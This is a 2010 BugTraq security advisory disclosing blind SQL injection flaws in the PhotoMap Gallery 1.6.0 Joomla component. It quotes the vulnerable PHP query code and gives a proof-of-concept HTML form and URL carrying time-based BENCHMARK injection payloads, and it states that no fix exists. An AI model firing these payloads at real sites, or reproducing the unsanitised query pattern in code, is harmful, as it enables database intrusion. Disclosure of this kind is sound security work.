BugTraq
PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection Jul 28 2010 01:58PM
Salvatore Fresta aka Drosophila (drosophilaxxx gmail com)

PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection

Name PhotoMap Gallery
Vendor http://photoindochina.com
Versions Affected 1.6.0

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-28

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION
________________________

PhotoMap Gallery is a gallery component completely
integrated into Joomla 1.5.x. Like 'Picasa', 'Flickr',
or 'Panoramio', you can easily add geo-tags to your
photos so that you can remember exactly where they're
from using Google Maps.

II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being
used in SQL queries.

III. ANALYSIS
_____________

Summary:

A) Multiple Blind SQL Injection

A) Multiple Blind SQL Injection
_______________________________

The parameter id passed to controller.php via POST when
view is set to user and task is set to save_usercategory
is not properly sanitised before being used in a SQL
query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.

The parameter folder passed to imagehandler.php is not
properly sanitised before used in a SQL query. This can
be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

The following is the affected code.

controller.php (line 1135):

function save_usercategory() {

// Check for request forgeries

JRequest::checkToken() or jexit( 'Invalid Token' );

$user = & JFactory::getUser();

$task = JRequest::getVar('task');

$post = JRequest::get('post');

//perform access checks

$isNew = ($post['id']) ? false : true;

// $catid = (int) JRequest::getVar('catid', 0);

$db =& JFactory::getDBO();

$query = 'SELECT c.id, c.directory'

. ' FROM #__g_categories AS c'

. ' WHERE c.id = '.$post['id'];

imagehandler.php (line 109);

function getList() {

static $list;

// Only process the list once per request

if (is_array($list)) {

return $list;

}

// Get folder from request

$folder = $this->getState('folder');

$search = $this->getState('search');

$query = 'SELECT *'

. ' FROM #__g_categories'

. ' WHERE id = '.$folder;

IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

Replace 89eb36eca1919aff534b13b54796c9a4 with your own.

<html>
<head>
<title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
</head>
<body>
<form method="POST" action="http://127.0.0.1/joomla/index.php">
<input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
<input type="hidden" name="option" value="com_photomapgallery">
<input type="hidden" name="controller" value="">
<input type="hidden" name="view" value="user">

<input type="hidden" name="task" value="save_usercategory">

<input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
<input type="submit">
</form>
</body>
</html>

http://site/path/index.php?option=com_photomapgallery&view=imagehandler&
folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

V. FIX
______

No fix.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus